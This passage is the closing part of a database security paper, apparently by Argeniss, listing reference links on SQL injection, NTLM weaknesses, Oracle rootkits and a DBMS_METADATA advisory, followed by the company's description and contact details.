http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
[5] NTLM stuff
http://www.isecpartners.com/documents/NTLM_Unsafe.pdf
http://davenport.sourceforge.net/ntlm.html
[6] Papers, advisories and exploits
http://www.argeniss.com/research.html
[7] Oracle Rootkits 2.0
http://www.red-database-security.com/wp/oracle_rootkits_2.0.pdf
[8] Multiple SQL Injection vulnerabilities in DBMS_METADATA package
http://www.appsecinc.com/resources/alerts/oracle/2005-031.html
[9] DBMS_METADATA Exploit
http://www.argeniss.com/research/OraDBMS_METADATAExploit.txt
About Argeniss
Argeniss is an information security company specialized in application and database security. We offer services such as vulnerability information, exploit development, software auditing, penetration testing and training; we also offer exploits for widely deployed software.
Contact us
Buenos Aires 463
Parana, Entre Rios
Argentina
E-mail: info>.at.<argeniss>.dot.<com
Tel: +54-343-4231076
Fax: 1-801-454-5614
